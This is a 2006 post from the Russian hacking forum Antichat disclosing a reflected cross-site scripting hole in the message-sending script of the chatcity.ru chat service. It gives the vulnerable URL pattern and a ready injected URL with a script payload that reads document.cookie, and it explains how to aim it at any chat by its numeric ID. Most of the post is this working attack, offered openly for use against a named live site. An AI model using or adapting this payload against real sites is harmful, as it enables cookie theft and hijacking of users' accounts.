15.11.2006, 19:32
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
CHATCITY.RU
Ухх как xss пошли то=) Уязвимость существует в скрипте отправки сообщений на какой либо ник. Например:
Код:
http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn=[sL1p]
Вместо ника, подставляем наш код. В итоге:
Код:
http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn="><script>alert(document.cookie)</script>
Chat ID заменяем на адрес чата. У всех они в цифровом значении.
|
|
|